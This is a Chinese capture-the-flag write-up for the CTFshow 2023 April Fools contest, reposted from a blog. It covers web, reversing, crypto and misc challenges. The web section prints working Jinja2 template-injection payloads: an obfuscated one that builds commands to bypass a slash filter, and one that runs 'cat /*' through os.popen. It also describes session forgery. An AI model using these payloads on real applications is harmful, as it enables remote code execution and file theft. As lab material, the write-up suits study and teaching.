CTFSHOW愚人杯2023 部分wp
web
easy_signin
url是base64编码后的文件名
直接读个index.php
然后查看源码 解码base64
easy_ssti
过滤了斜杠,不能访问根目录了,考虑手动拼接一个{{lipsum.__globals__.os.popen(lipsum.__globals__.__str__().__getitem__(34)~lipsum.__globals__.__str__().__getitem__(5)~lipsum.__globals__.__str__().__getitem__(22)~lipsum.__globals__.__str__().__getitem__(139)~lipsum.__globals__.__str__().__getitem__(288)~lipsum.__globals__.__str__().__getitem__(87)~lipsum.__globals__.__str__().__getitem__(24)~lipsum.__globals__.__str__().__getitem__(5)~lipsum.__globals__.__str__().__getitem__(54)).read()}}
easy_flask
session伪造
伪造成admin登录后可以任意文件下载
下个app.py看源码
hello路由下存在ssti
可以tplmap一把梭
手动挡payload如下
request.__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat /*").read()')
re
easy_pyc
反编译得到py源码
uncompyle6 -o a.py xxx.pyc
crypto
easy_base
签到 解码base64即可
misc
奇怪的压缩包
09改00然后bandzip修复
crc爆破宽高
修改高度为300
Ocr识别得到
5oSa5Lq66lqC5b+r5LmQ77yB77yB77yB解base64可以得到类似愚人节快乐的字符串
没什么用
Binwalk抽下图
发现里面还有一个压缩包
010打开
在最后发现key的base64编码后的值,解码得到yurenjie
解压得到图片
crc 完了ocr
琴柳感
观察发现除去开头和结尾独立的两句话 一共来回四句话
猜测四进制
四位一组要想能解出字母第一位必是1 因为4^3 =64
那么所有的你有没有感受到城市在分崩离析?
替换为1,另外三局遍历替换
最终得到的四进制的字符串
120313101212130312201233131313231320122112321213120213111203121112321213132012211232121311331321122112021311132212011221132112211133132212011221122312111230122112011232132112211230122112011232120212011331
来源地址:https://blog.csdn.net/qq_35782055/article/details/129895564
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341